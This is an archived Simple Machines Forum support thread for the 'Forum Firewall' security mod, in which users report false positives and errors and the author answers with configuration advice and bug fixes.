Simple Machines Community Forum

Customizing SMF => Modifications and Packages => Topic started by: butchs on January 15, 2011, 11:00:37 AM

Title: Forum Firewall
Post by: butchs on January 15, 2011, 11:00:37 AM
Link to Mod (https://custom.simplemachines.org/mods/index.php?mod=2815)

Forum Firewall
* protection against bad people doing bad things *



Authors Official Support thread is at SMF Helper (http://www.smfhelper.com/community/index.php/topic,5930.0.html).



Written by:                   butchs (http://www.simplemachines.org/community/index.php?action=profile;u=77887)
Testing by:                    AngelinaBelle, Lou69, snoopy_virtual and Wizzlefits
Current mod version:  2.0.1
Supported languages: (http://www.simplemachines.org/site_images/lang/english.gif) english, (http://www.simplemachines.org/site_images/lang/spanish_es.gif) spanish_es, (http://www.simplemachines.org/site_images/lang/spanish_latin.gif) spanish_latin, (http://www.simplemachines.org/site_images/lang/portuguese_brazilian.gif) portuguese_brazilian, (http://www.simplemachines.org/site_images/lang/portuguese_pt.gif) portuguese_pt
Hack Attempts:             Please share in the support thread so we can all be safe
Translations:                Translations are accepted (see FF_Language.zip)

After over six months of heavy programming along with tons of research and development, I am proud to offer my version of a SMF Forum Firewall.  I believe this is one of the most comprehensive and flexible schemes of its kind out there.  If you choose to try this mod please read the help (http://www.simplemachines.org/community/Themes/default/images/helptopics.gif) topics and run it for a few days before blocking visitors.  I hope my work keeps your forum safe?

(https://www.paypal.com/en_US/i/btn/btn_donate_LG.gif) (https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=UJTMMF8FKGLZ6&lc=US&item_name=butchs%2f%20continued%20updates&currency_code=USD&bn=PP%2dDonationsBF%3abtn_donateCC_LG%2egif%3aNonHosted)

Sincerely,
butchs (http://www.simplemachines.org/community/index.php?action=profile;u=77887)



Forum Firewall offers 13 tests for the forum operator that protect against unwanted visitors.  Forum Firewall is written as a supplement to existing site protection methods and should not be the only line of protection.  An ideal protection scheme is as follows:

The above protection will not stop a determined attacker but it just may send them looking for easier targets.




Some features in this modification:




SMF 1.x version does not have:  Auto trimming of the visitor log and automatic scan of image files.

It is recommended that you do not enable "Block Violations" until after you operated the mod for several days and you are fully confident that there are no infractions in the visitor logs that can deny you or your top members access.



Version History


1.0.0 --  October 24, 2010
2.0.0 - June 14, 2014 - REWRITE in anticipation for SMF 2.1.  IPv6 support, improved Country blocks, New test conditions, improved codes, bug fixes, more bots for robots.txt, spam post to challenge test, xrunner detection, changes thanks MDARULZ, sorting per societyofrobots, Portuguese Translated by Darkness.  Mod will install on SMF 2.1 Alpha 1 to be used for testing purposes only.  A complete uninstall of previous versions is recommended before installation.
2.0.1 - Bug fixes.


Terms of use



By downloading and/or using this MOD you agree to adhere to the following conditions for all versions of the Forum Firewall mod:

Forum Firewall is licensed under a (http://i.creativecommons.org/l/by-nc-nd/3.0/88x31.png) (http://creativecommons.org/licenses/by-nc-nd/3.0/)






Bienvenido a Forum Firewall.  El m√≥dulo Firewall escrito para SMF 2.0.

Forum Firewall ofrece 13 an√°lisis para la gesti√≥n avanzada del foro, que lo protegen contra los intentos de hacking (pirateo). Forum Firewall es un complemento a los m√©todos anti-hacking existentes  y no debe ser la √∫nica l√≠nea de protecci√≥n. Un esquema de protecci√≥n ideal es el siguiente:
Bienvenido a Forum Firewall.  El modulo Firewall escrito para SMF 2.0.

Forum Firewall ofrece 13 análisis para la gestión avanzada del foro, que lo protegen contra los intentos de hacking (pirateo). Forum Firewall es un complemento a las herramientas anti-hacking existentes  y no debe ser la única medida de protección.

Un esquema de protección ideal es el siguiente:
Esta protección podría no detener a un atacante determinado, pero por lo general les llevara a buscar objetivos mas fáciles.



Una vez visto lo anterior, permitamos hablar ahora sobre el mod Forum Firewall. Las características de esta versión son las siguientes:



Saludos (translated by papones)

Title: Re: Forum Firewall
Post by: JBlaze on January 15, 2011, 11:05:33 AM
Congrats! This is an awesome mod!
Title: Re: Forum Firewall
Post by: flapjack on January 15, 2011, 12:14:09 PM
finally, it really is one awesome mod :) I thought you gave up on submitting it
Title: Re: Forum Firewall
Post by: butchs on January 15, 2011, 12:49:53 PM
Thanks guys I was getting close.  I guess the problem was indexing of member groups with some of the original versions of SMF that I did not know about.  I have been working on a workaround all morning.  I still have to test the code.  Will include it in the next version.
Title: Re: Forum Firewall
Post by: busterone on January 15, 2011, 12:51:35 PM
Looks to be fantastic mod. I haven't installed or tested it yet, but I will be trying this one out very soon. Thanks for the work.  :)
Title: Re: Forum Firewall
Post by: Joker™ on January 15, 2011, 12:55:32 PM
Only one word for this mod, Awesome.
Title: Re: Forum Firewall
Post by: Masterd on January 15, 2011, 01:32:13 PM
I can say just this.

This mod is great! :D

I'm glad because it's finally approved.
Title: Re: Forum Firewall
Post by: Matthew K. on January 15, 2011, 01:46:40 PM
Glad to see you finally got it submitted :)
Title: Re: Forum Firewall
Post by: flapjack on January 15, 2011, 02:04:53 PM
I presume it was submitted months ago, but approved just today :)
Title: Re: Forum Firewall
Post by: Masterd on January 15, 2011, 02:07:23 PM
Quote from: flapjack on January 15, 2011, 02:04:53 PM
I presume it was submitted months ago, but approved just today :)

It has been submited in October.
Title: Re: Forum Firewall
Post by: butchs on January 15, 2011, 02:48:07 PM
It was submitted very long time ago on a distant planet...   O:)
Title: Re: Forum Firewall
Post by: THE BRA1N on January 15, 2011, 03:31:21 PM
Installed it on RC3 and getting a blank page for Forum Firewall settings on all themes.
Title: Re: Forum Firewall
Post by: żεχเ๏ภ on January 15, 2011, 04:08:43 PM
I've been using this mod since I found it on pctweakr. Probably for about a month or longer. It really does work.  :) I love being able to block bad bots and hackers. I guess its more helpful to huge forums though. I'm happy its approved.



Jason
Title: Re: Forum Firewall
Post by: busterone on January 15, 2011, 04:16:16 PM
OK, installed on a small test forum and all is well. I do have a question about one feature.
If I install it on my main site, we have more than one admin. If I enable Admin IP Confirmation, will it block out the other admins if I input mine, or can I input multiple comma separated IPs ?
Title: Re: Forum Firewall
Post by: Matthew K. on January 15, 2011, 04:17:39 PM
Busterone - Without looking at the code, I'd assume it'd let them in too.
Title: Re: Forum Firewall
Post by: kat on January 15, 2011, 05:13:58 PM
/me is confused...

"By downloading and/or using this MOD you agree to adhere to the following conditions for all versions of the Bad Behavior mod:"

Is that a typo?
Title: Re: Forum Firewall
Post by: NanoSector on January 15, 2011, 05:38:02 PM
Quote from: K@ on January 15, 2011, 05:13:58 PM
/me is confused...

"By downloading and/or using this MOD you agree to adhere to the following conditions for all versions of the Bad Behavior mod:"

Is that a typo?
I think a copy-pasta typo ;)
Title: Re: Forum Firewall
Post by: JBlaze on January 15, 2011, 05:41:06 PM
If I'm not mistaken, it includes the Bad Behavior mod, thus the reason for having to agree to its terms as well.
Title: Re: Forum Firewall
Post by: NanoSector on January 15, 2011, 05:42:35 PM
Quote from: JBlaze on January 15, 2011, 05:41:06 PM
If I'm not mistaken, it includes the Bad Behavior mod, thus the reason for having to agree to its terms as well.
Good point.
Title: Re: Forum Firewall
Post by: DoctorMalboro on January 15, 2011, 06:10:49 PM
How many resources does this mod consume... let's say monthly?
Title: Re: Forum Firewall
Post by: butchs on January 15, 2011, 09:45:56 PM
Quote from: THE BRA1N on January 15, 2011, 03:31:21 PM
Installed it on RC3 and getting a blank page for Forum Firewall settings on all themes.

It is made for the default theme so if you have a custom theme that may be the issue.  Otherwise I need more info...   :-[

Quote from: busterone on January 15, 2011, 04:16:16 PM
OK, installed on a small test forum and all is well. I do have a question about one feature.
If I install it on my main site, we have more than one admin. If I enable Admin IP Confirmation, will it block out the other admins if I input mine, or can I input multiple comma separated IPs ?

It will block them if they have different internet providers.  Something to look at for future versions...   :'(

FYI - I recommend that this mod is run in logging mode for a few days and make adjustments before turning on blocking mode.  I recommend this just to make sure you do not block your members.  8)

Quote from: K@ on January 15, 2011, 05:13:58 PM
/me is confused...

"By downloading and/or using this MOD you agree to adhere to the following conditions for all versions of the Bad Behavior mod:"

Is that a typo?
:P
Quote from: JBlaze on January 15, 2011, 05:41:06 PM
If I'm not mistaken, it includes the Bad Behavior mod, thus the reason for having to agree to its terms as well.

It was a typo...  BB is a separate mod.   :o

Quote from: DoctorMalboro on January 15, 2011, 06:10:49 PM
How many resources does this mod consume... let's say monthly?

Not sure what you mean by that question.   :-X

But the mod is coded with speed and memory conservation in mind.  :laugh:

Title: Re: Forum Firewall
Post by: busterone on January 15, 2011, 09:57:59 PM
Quote from: butchs on January 15, 2011, 09:45:56 PM
It will block them if they have different internet providers.  Something to look at for future versions...   :'(

FYI - I recommend that this mod is run in logging mode for a few days and make adjustments before turning on blocking mode.  I recommend this just to make sure you do not block your members.  8)
Ok, yep, that is an idea for future development. For now, once I install it on the live site and do eventually set it for blocking mode, I will leave the Admin IP Confirmation turned off. 
Thanks.  :)
Title: Re: Forum Firewall
Post by: Kindred on January 15, 2011, 10:02:16 PM
Yup... Just before approval, I bumped into a problem backed on a forum that ha been upgraded since yabb and thus has some odd artifacts in database data.  Looking forward to th update to fix it. :)
Title: Re: Forum Firewall
Post by: Bigguy on January 16, 2011, 02:47:03 AM
Congrats Butchs, glad to see it approved. Works great on my forum and has for awhile now. :)
Title: Re: Forum Firewall
Post by: henrik1782 on January 16, 2011, 07:36:32 AM
Hi Butch....

Thanks for a nice mod. Mods that extend security is always appreciated.

I have the Enotify mod installed and get a lot of error messages regarding this mod.

Bypass attempt!
for /index.php?PHPSESSID=7d31a4b254d2f144b620a4bacdb65264&action=enotify

Bypass attempt!
for /index.php?topic=287.msg590


Is this something in the configuration of your mod or something else....?
Title: Re: Forum Firewall
Post by: butchs on January 16, 2011, 08:39:48 AM
Thanks Bigguy.

Quote from: Kindred on January 15, 2011, 10:02:16 PM
Yup... Just before approval, I bumped into a problem backed on a forum that ha been upgraded since yabb and thus has some odd artifacts in database data.  Looking forward to th update to fix it. :)

I wrote something I think will work yesterday but I still have to test it...  I usually run it a week live before publishing.  If you like, I can email you a copy and you can see if it works?
Title: Re: Forum Firewall
Post by: butchs on January 16, 2011, 08:52:37 AM
Quote from: henrik1782 on January 16, 2011, 07:36:32 AM
Hi Butch....

Thanks for a nice mod. Mods that extend security is always appreciated.

I have the Enotify mod installed and get a lot of error messages regarding this mod.

Bypass attempt!
for /index.php?PHPSESSID=7d31a4b254d2f144b620a4bacdb65264&action=enotify

Bypass attempt!
for /index.php?topic=287.msg590


Is this something in the configuration of your mod or something else....?

If you are not behind a proxy then uncheck "Enable Bypass Protection".  If you are you need to fix the information.  ie read "Admin Domain Name" for details.
Title: Re: Forum Firewall
Post by: henrik1782 on January 16, 2011, 09:10:31 AM
Thanks...

Henrik
Title: Re: Forum Firewall
Post by: DoctorMalboro on January 16, 2011, 09:19:22 AM
Quote from: butchs on January 15, 2011, 09:45:56 PM
Quote from: DoctorMalboro on January 15, 2011, 06:10:49 PMHow many resources does this mod consume... let's say monthly?
Not sure what you mean by that question.   :-X

But the mod is coded with speed and memory conservation in mind.  :laugh:

I mean if it does too many queries to the database... you know, some mods can be heavy and eat a lot of resources... that's what i'm asking.
Title: Re: Forum Firewall
Post by: Kindred on January 16, 2011, 10:08:08 AM
hey butchs,

Give it a day or two to confirm on your test site and then send it to me. I'll validate for you before you update the whole package (hopefully it's just a file overwrite instead of a mod re-install?) :)
Title: Re: Forum Firewall
Post by: henrik1782 on January 16, 2011, 11:15:39 AM
Hi Butch...

When mailing warrents like

Invalid ip!
for /index.php?action=login2

i would be much appreciated if the IP address was mentioned to.

This mod works great and captures some of the intruders that are not covered by Honeypot and Spammer mod.

Best regards.
Title: Re: Forum Firewall
Post by: henrik1782 on January 16, 2011, 11:24:33 AM
Hi Butch...

I have to ask and hopefully more will learn from it  ;)

What does this warning mean:

Hack:  Redirect!
for /index.php?wwwRedirect

Hack:  Repeated!
for /index.php?action=enotify


Best regards
Henrik Poulsen
Title: Re: Forum Firewall
Post by: NanoSector on January 16, 2011, 11:50:22 AM
Quote from: henrik1782 on January 16, 2011, 11:24:33 AM
Hi Butch...

I have to ask and hopefully more will learn from it  ;)

What does this warning mean:

Hack:  Redirect!
for /index.php?wwwRedirect

Hack:  Repeated!
for /index.php?action=enotify


Best regards
Henrik Poulsen
That's normal.

The ?wwwRedirect is because the forum needed to get www. before the actual address.

The ?action=enotify is also nothing to worry about since eNotify needs to load from it.
Title: Re: Forum Firewall
Post by: henrik1782 on January 16, 2011, 12:29:06 PM
Thanks butch...
Title: Re: Forum Firewall
Post by: NanoSector on January 16, 2011, 12:35:01 PM
Quote from: henrik1782 on January 16, 2011, 12:29:06 PM
Thanks butch...
Wut...?

No problem, I guess?
Title: Re: Forum Firewall
Post by: butchs on January 16, 2011, 12:35:18 PM
Impostor.   ;D Some want it some do not but if you remove "Redirect|" from the xss and injection list it will go away.  Remember to leave one "|" between each phrase.
Title: Re: Forum Firewall
Post by: henrik1782 on January 16, 2011, 01:03:36 PM
Sorry...  ;)

Thanks goes to Simple Series team

Best regards

Title: Re: Forum Firewall
Post by: butchs on January 16, 2011, 03:44:06 PM
Quote from: Kindred on January 16, 2011, 10:08:08 AM
hey butchs,

Give it a day or two to confirm on your test site and then send it to me. I'll validate for you before you update the whole package (hopefully it's just a file overwrite instead of a mod re-install?) :)

Sorry but you will need to uninstall and reinstall the new mod version.  But not a DB uninstall.

Please PM me your email.
Title: Re: Forum Firewall
Post by: Bancherd on January 16, 2011, 05:46:36 PM
Interesting mod  :), I will give it a spin.
Title: Re: Forum Firewall
Post by: THE BRA1N on January 17, 2011, 07:47:24 AM
Quote from: butchs on January 15, 2011, 09:45:56 PM
Quote from: THE BRA1N on January 15, 2011, 03:31:21 PM
Installed it on RC3 and getting a blank page for Forum Firewall settings on all themes.

It is made for the default theme so if you have a custom theme that may be the issue.  Otherwise I need more info...   :-[


Well, I get a blank white page with the default theme instead of a firewall settings page. There were no conflicts when installing with package installer. No error in the error log about it so I don't know where to start looking. What sort of info do you need?

Title: Re: Forum Firewall
Post by: butchs on January 17, 2011, 05:42:57 PM
Humm...  Sounds like the same thing Kindred saw with his unsorted member groups.  I should have a fix soon.
Title: Re: Forum Firewall
Post by: butchs on January 17, 2011, 08:31:12 PM
Ok, version 1.0.1 fixes the blank white page admin screen issue.  Those who get this error should uninstall and install the new revision.  For all others upgrade is optional.
8)
Title: Re: Forum Firewall
Post by: KensonPlays on January 17, 2011, 08:40:35 PM
Thanks for this! I'll have this, stop spammer, and httpBL now! (Already with just other two 600+ spammers blocked :) )
Title: Re: Forum Firewall
Post by: flapjack on January 17, 2011, 09:06:59 PM
in only an hour after installing the same combo I had over 100 spammers blocked
Title: Re: Forum Firewall
Post by: busterone on January 17, 2011, 09:20:34 PM
I have a situation that has me puzzled. The answer may be right in front of me, but I can't see it.  :)
With SQL Injection test enabled, the mod is flagging my normal members as hack attempts whenever they try to delete a personal message from their inbox.
This is an example of the header it recorded
GET /index.php?action=pm;sa=pmactions;pm_actions[40707]=delete;f=inbox;start=0;b5c9d1f=f9386db172f6d1b4743fc971b796f7c1
HTTP/1.1 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 ( .NET CLR 3.5.30729) SearchToolbar/1.2 http://www.thedemonsden.com/index.php?action=pm;f=inbox;l=-1;done=sent
and the reason column says - Hack: Disallowed characters! 


another member is flagged doing the same, attempting to delete a PM.  They both have reported to me that they got a 403 error when attempting to delete PMs
this one's header was
GET /index.php?action=pm;sa=pmactions;pm_actions[40617]=delete;f=inbox;start=1740;f6dd1f7f0=4ffba150984c26ed3fc2d8af50b28918
HTTP/1.0 Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 http://www.thedemonsden.com/index.php?action=pm;f=inbox;l=-1;sort=date;start=1740
same reason- Hack: Disallowed characters!

I confirmed the IPs are of the respective users. What am I missing here? It should not be blocking normal forum operations.

Sorry, I forgot to post my version. RC4 - No errors were in the error log either.
Title: Re: Forum Firewall
Post by: butchs on January 18, 2011, 05:14:34 AM
I did not test that one.  What was the first reason in the logs?  There it usually lists the offending character.
Title: Re: Forum Firewall
Post by: busterone on January 18, 2011, 07:10:20 AM
nope, it just said Hack: Disallowed characters!  without listing the offending character. And nothing in the forum error log.
I just disabled injection test for the time being so they can carry own as usual. 
I will be away for most of the day, but when I return, I can re enable it and see if I can get more info. 
Title: Re: Forum Firewall
Post by: Am' on January 18, 2011, 12:26:10 PM
a very nice mod, thx
Title: Re: Forum Firewall
Post by: THE BRA1N on January 18, 2011, 02:56:12 PM
Quote from: butchs on January 17, 2011, 08:31:12 PM
Ok, version 1.0.1 fixes the blank white page admin screen issue.  Those who get this error should uninstall and install the new revision.  For all others upgrade is optional.
8)

Indeed, that flawlessly fixed the white page issue for me. Great work and great mod.



Title: Re: Forum Firewall
Post by: kat on January 18, 2011, 04:56:36 PM
Quote from: butchs on January 15, 2011, 09:45:56 PMIt was a typo...  BB is a separate mod.   :o

Thanks for clarifying. :)
Title: Re: Forum Firewall
Post by: busterone on January 18, 2011, 06:44:19 PM
Quote from: Arantor on January 18, 2011, 05:05:09 PM
The disallowed characters in the log are [ and ] which wouldn't normally be in URLs but can be. Additionally if it flags that, it might also flag up certain circumstances of searching where stuff is base64 encoded and pushed through the URL that way.
I am not quite sure I am following you here. If I am getting you, that is part of the SMF code for deleting pms, and the only thing to do is to keep the injection test turned off?
Title: Re: Forum Firewall
Post by: butchs on January 18, 2011, 07:46:01 PM
Be nice Arantor.  ;)  I started writing this mod this time last year.  It has months of testing, took many months to get approved and many people have used it with no major issues.   O:)

busterone, I just came home and turned off the admin check on my test server and deleted 5 PM's, then 1 and finally a whole row of PM's with no errors in the FF visitor log for SMF 2.0 RC4.  Honestly, I am not sure if "[" or "]" are even used by SMF.  I have to check.

Needless to say, the mod is fully admin adjustable.  So if  "[" or "]" are required by SMF or you do not care about your admins security then all you need to do is edit the "Permitted URI Characters" regular expression.  8)

Try changing it from a-z 0-9~%$,.:;&#?/+=_\- to a-z 0-9~%$,.:;[]&#?/+=_\- May do the trick (someone better with this regex patterns may have a better idea).  Personally I will have to advise against it unless someone can prove if they are required characters.
  :P
Title: Re: Forum Firewall
Post by: geminisnake on January 18, 2011, 08:50:18 PM
Tried installing the latest version on 1.1.12 and got:

Fatal error: Call to undefined function FFCopyright() in /home/dark/public_html/forum/Sources/Load.php(1733) : eval()'d code on line 373

Haven't been able to work it out yet ...  :)
Title: Re: Forum Firewall
Post by: busterone on January 18, 2011, 09:18:40 PM
Thanks butchs,  I was wondering that myself, but I got busy with some other stuff and haven't had time to post back yet. 

I will try it for awhile and see what happens. I doubt that by changing it to your suggestion will reduce the security too much, considering the amount of forums that run without this mod anyway, so what can it hurt.
I am open to any other ideas that Arantor or anyone else may have as well.  I am sure we can work out any quirks that come up.  :)
Title: Re: Forum Firewall
Post by: butchs on January 19, 2011, 07:18:26 PM
Quote from: Arantor on January 19, 2011, 02:28:51 AM
Hey, just pointing out that it is, right now, too sensitive, not trying to dig on your turf or anything...

The mod can be adjusted.  The default settings are strict as per many internet standards.  If someone prefers less secure then any one can adjust and turn off and on settings.  For a small site all you really need is the DOS and IP check settings.   8)

The reason your statement concerns me is because it is a blanket statement and can be misunderstood.  It could cause an admin to make an error.  Take for example the following:

One user reported that google was getting blocked most of the time.  He thought it was a sensitivity issue.  That was incorrect and the banned addresses were simply google impostors looking for vulnerability (If you look at the pctweakr thread you will see how to check it).  The robots.txt and google settings were looked at, no changes to FF were made and a few weeks later google was still at the site this time it was the real google.  :o

So please post up any changes you recommend.  I made it adjustable for that reason... Maybe in a future version I can add:  high, medium and low security settings.   :-X

I for one prefer to make sure that the character are in fact used by SMF instead of adding one just to be safe.

Quote from: Arantor on January 19, 2011, 02:28:51 AM
I really hope that's being pushed through preg_quote first seeing how [, ], $, ? and + are all special characters in regular expressions, but judging by the \- I'm assuming not...

Impressive.  Yes, FF uses "preg_quote".

I will be the first to admit that I am not a regex pattern guy.  So far I have been using a pattern based off of an edited version of the popular "CodeIgniter" pattern.  I used that pattern because that program published patterns for many languages.  It seems to work?  It will be nice to see better patterns...   :D

Quote from: Arantor on January 19, 2011, 02:28:51 AM
The practical answer is that the effective change on security is not significant by adding these legitimate URL characters into the mix, when SMF does use them. If you're really paranoid of course you could rewrite where the URLs are generated and processed but that's not really recommended.

I can not agree more.  :)

Still, I am paranoid when it comes to security.  I get nervous when it comes to PM's because I recall an attack on vbulliteen  :-[ where someone sent loaded PM's to admins (not that I know anything about that) in order to read their cookies and get their passwords.

But if you say it is used then I must bow to your high SMF expertise.
Title: Re: Forum Firewall
Post by: henrik1782 on January 20, 2011, 04:31:19 PM
Hi Butchs....

I suddenly get this error from a regular user:

80.162.225.97 Gæst Beklager Gæst, du er udelukket fra at bruge dette forum!
DOS Attack!
Denne bandlysning er sat til at udløbe 21. Januar 2011, 13:58:57 pm.
?action=enotify I dag ved 22:16:53

It is strang because when I look in the visitors log the last log event is:

981 213.46.136.183 2011-01-20 20:09:59 GET /index.php/topic,116.0.html?PHPSESSID=34c429d9c82bc3b096fbbb9160636ea5 HTTP/1.1 Java/1.6.0_23 http://192.168.1.10:8080/cgi-bin/index.cgi#  DOS Attack!

Could this possible be virus on her computer causing this ?
Title: Re: Forum Firewall
Post by: henrik1782 on January 20, 2011, 04:37:04 PM
The user has been banned from the board, do you have any suggestions on how to avoid this in the future...?
Title: Re: Forum Firewall
Post by: henrik1782 on January 20, 2011, 04:45:11 PM
Ok.. thanks.

I could se in the log that Enotify and Forum Firewall is not a perfect match. Do you know any alternatives to Enotify.

Best regards
Henrik
Title: Re: Forum Firewall
Post by: henrik1782 on January 20, 2011, 05:01:37 PM
Thanks a lot Arantor for your help.

Best regards
Henrik
Title: Re: Forum Firewall
Post by: Bagheera on January 20, 2011, 05:42:17 PM
First, thank you for your hard work, its really appreciated  :D

I installed it and looks like it works perfectly. I have a question about, what to turn on. I am technically challenge in stuff like that  :-X 
In the pic you can see what I did so far. Can you tell me what else I can turn on or what else I can set it up?

Thank you
Title: Re: Forum Firewall
Post by: butchs on January 20, 2011, 07:07:51 PM
Quote from: Arantor on January 20, 2011, 03:51:55 AM
The actual log excerpt that kicked this debate off showed the link where it was created. It's not common at all, though. More importantly, I have no doubt there are mods that use [] in links which could also be adversely affected here.

I know [] are RFC 3986 Reserved Characters but they are "gen-delims" that as I see may not be used by the default SMF package.  Too add them will just add one more character that can be used as a vulnerability.   ie if you look in "PersonalMessage.php" you will see that the second half of the original post is part of an array and as I see it is not part of the action script.  More or less anyone can change the second number in an attempt to remotely cause issues.  This is a potential problem so unless someone can not prove it is part of default SMF it will not make my default list.

This mod is strictly a SMF security mod made for the default module that was created with default SMF.

Quote from: Arantor on January 20, 2011, 03:51:55 AM... but one backed by plenty of years of experience. An 'extra security' package is fantastic, but if on its default settings, impairs the existing functionality adversely...

I dunno but I am a self taught programmer who has been writing code since the 70's.

My opinion is that you run this mod for a few days in logging mode and if you have an issue either ask or search the thread.  Then you have a mod that is getting flagged and it is possible then by all means change the settings.  But to make it watered down and generic because of some perceived mod is not what I want to do.

As with all new mods there will be a period of time where new things will pop up and cause changes.  I am sure there will be something I will have to change.  This thread is for a mod that is user configurable and if people find solutions or new attacks please post them up.
Title: Re: Forum Firewall
Post by: butchs on January 20, 2011, 07:10:55 PM
Quote from: henrik1782 on January 20, 2011, 04:37:04 PM
The user has been banned from the board, do you have any suggestions on how to avoid this in the future...?


Another option would be to whitelist the members group.  I have one who has some weird security stuff that caused him to get banned all the time.  So I created this feature.  You can create a group and then assign it to the member.

In RC4 got to:  "Admin/Members/Manage Permissions: Forum Firewall Whitelist Group" to do so.
Title: Re: Forum Firewall
Post by: henrik1782 on January 20, 2011, 07:18:21 PM
Hi Butchs

Thanks for pointing this out I have totally overseen this posibility.

For the moment I have set the Enotify refresh rate from 10000 to 30000 (30sek) and this seems to work for now.
Title: Re: Forum Firewall
Post by: butchs on January 20, 2011, 07:21:03 PM
Quote from: henrik1782 on January 20, 2011, 04:45:11 PM
Ok.. thanks.

I could se in the log that Enotify and Forum Firewall is not a perfect match. Do you know any alternatives to Enotify.

Best regards
Henrik

Not sure what the issue is but there are some mods that heavily use the "actionArray", use up loads of bandwidth and get flagged by FF.  I have a workaround for one but honestly if they were coded differently they would be faster.

If there is not a replacement I will add it to my things to look at list.
Title: Re: Forum Firewall
Post by: butchs on January 20, 2011, 07:22:26 PM
Quote from: henrik1782 on January 20, 2011, 07:18:21 PM
For the moment I have set the Enotify refresh rate from 10000 to 30000 (30sek) and this seems to work for now.

Interesting, sounds like that may do the trick since it should slow down the "actionArray" calls.  if that is the issue.

Title: Re: Forum Firewall
Post by: butchs on January 20, 2011, 07:26:51 PM
Quote from: RenegadesForum on January 20, 2011, 05:42:17 PM
First, thank you for your hard work, its really appreciated  :D

I installed it and looks like it works perfectly. I have a question about, what to turn on. I am technically challenge in stuff like that  :-X 
In the pic you can see what I did so far. Can you tell me what else I can turn on or what else I can set it up?


FYI - Your admin domain will not work you need to delete the numbers in the front of it.

Please change your salt and delete the images in the post since others have seen it.
Thank you

If you do not have much traffic then I suggest you run DOS protection and the ip check.  But before you turn on banning run it for a day or so and make sure you are not banning the wrong people.

Please delete the images from your post and change your salt.
Title: Re: Forum Firewall
Post by: busterone on January 20, 2011, 07:39:12 PM
I have another question.  :) It is more of a curiosity than an issue. The firewall log has 6 pages of invalid ip's just today. I included a screenie so you can see an example. I haven't had any users complain, so I doubt these are regular members, but I am curious how there can be so many in just one day. The ip column has none listed as you can see in the screenie.  How are they even able to attempt to access the site with some kind of IP, even if it is spoofed?
Title: Re: Forum Firewall
Post by: butchs on January 20, 2011, 07:55:02 PM
Who checks ip addresses?  The internet is the wild west and anything goes.  There are few systems or software that actually check the ip address so these script kiddies have been doing what they want for several years.

An ip can be easily spoofed and can be used to access many sites.  That is not a bad one but there are a few that are worse like the ones who pretend to be google but really try to scalp email addresses.
Title: Re: Forum Firewall
Post by: busterone on January 20, 2011, 07:57:14 PM
True, I guess I had no idea that I had so many visit my site in one day.  ;D Like I said, just curious, no issue here. They were blocked and all is good.  :)
Title: Re: Forum Firewall
Post by: butchs on January 20, 2011, 07:59:27 PM
Oh that is ok please ask away...  People should understand that the bad bots are like natz and they will shut you down if you are not careful.
Title: Re: Forum Firewall
Post by: Bagheera on January 20, 2011, 08:29:12 PM
Thank you very much :) I did what you suggested and now I'll just hope the spammers will go away :D
Title: Re: Forum Firewall
Post by: THE BRA1N on January 21, 2011, 10:30:13 AM
Couple of questions - when it logs an "invalid IP in proxy list" and "invalid IP" - where is this 'proxy list' located and how does it determine whether an IP is valid or not? Also, how do you clear the Firewall log?

Title: Re: Forum Firewall
Post by: snoopy_virtual on January 21, 2011, 12:10:18 PM
Hi butchs

Congratulations. I see this mod got approved at last.

I have noticed anyway that you have written my name as a tester, so I suppose that means I should at least test it.  ;D

As soon as I test the mod I will add more comments if I find anything.
Title: Re: Forum Firewall
Post by: impreza on January 21, 2011, 12:52:38 PM
Cool addition, I tested and it looks very good
Title: Re: Forum Firewall
Post by: busterone on January 21, 2011, 07:17:01 PM
Sorry Butchs, I have another one.  ;D Not a biggie, just another observation.
Since I turned on the IP check, I get the same two errors repeatedly for guests only, no regular members.

http://www.thedemonsden.com/index.php?action=register
Undefined variable: result
File: /homepages/xx/xxxxxxxx/xxxxxx/forum/Sources/Subs-ForumFirewall.php
Line: 69

http://www.thedemonsden.com/index.php?action=register
Undefined variable: forumfirewall_data
File: /homepages/xx/xxxxxxxx/xxxxxx/forum/Sources/Subs-ForumFirewall.php
Line: 70

These same two undefined variables repeat for any action made by guests.

Title: Re: Forum Firewall
Post by: butchs on January 21, 2011, 07:35:33 PM
Quote from: THE BRA1N on January 21, 2011, 10:30:13 AM
Couple of questions - when it logs an "invalid IP in proxy list" and "invalid IP" - where is this 'proxy list' located and how does it determine whether an IP is valid or not? Also, how do you clear the Firewall log?

The first is an ip that was found within a proxy ip pool generally used by spam bots.  The second was a direct connection by a bot or a user who spoofed their ip.  Both of them failed the same test with non-conforming ip addresses.
8)
Title: Re: Forum Firewall
Post by: butchs on January 21, 2011, 07:44:17 PM
Quote from: snoopy_virtual on January 21, 2011, 12:10:18 PM
As soon as I test the mod I will add more comments if I find anything.

Oh no...  no second passes allowed.    :P
Title: Re: Forum Firewall
Post by: butchs on January 21, 2011, 07:53:29 PM
Quote from: busterone on January 21, 2011, 07:17:01 PM
Sorry Butchs, I have another one.  ;D Not a biggie, just another observation.
Since I turned on the IP check, I get the same two errors repeatedly for guests only, no regular members.

Thanks, I will work on it this weekend.
:)
Title: Re: Forum Firewall
Post by: busterone on January 21, 2011, 07:55:41 PM
No problem at all.  :)
Title: Re: Forum Firewall
Post by: snoopy_virtual on January 21, 2011, 08:18:19 PM
Quote from: butchs on January 21, 2011, 07:44:17 PM
Quote from: snoopy_virtual on January 21, 2011, 12:10:18 PM
As soon as I test the mod I will add more comments if I find anything.

Oh no...  no second passes allowed.    :P

What do you mean with "second passes"? I haven't done my first pass yet.  ;D
Title: Re: Forum Firewall
Post by: butchs on January 21, 2011, 08:29:09 PM
Remember you sent me an email with a long list and spanish translations.  Speaking of which, the latter could use an update.

:laugh:
Title: Re: Forum Firewall
Post by: snoopy_virtual on January 21, 2011, 08:46:45 PM
One thing is to translate and other thing is to test.  ;)

BTW, you are right. That translation I sent you ages ago must be really out-o-date.

I will put it in my list.
Title: Re: Forum Firewall
Post by: butchs on January 22, 2011, 06:50:33 AM
Quote from: Arantor on January 21, 2011, 02:48:01 AM
QuoteInteresting, sounds like that may do the trick since it should slow down the "actionArray" calls.  if that is the issue.

Let me see, a mod that queries the system every 10+ seconds for every single logged in user... yup, that might be the one.

Aeva media is another heavy "actionArray" user but I worked around it.
Title: Re: Forum Firewall
Post by: butchs on January 22, 2011, 07:40:12 AM
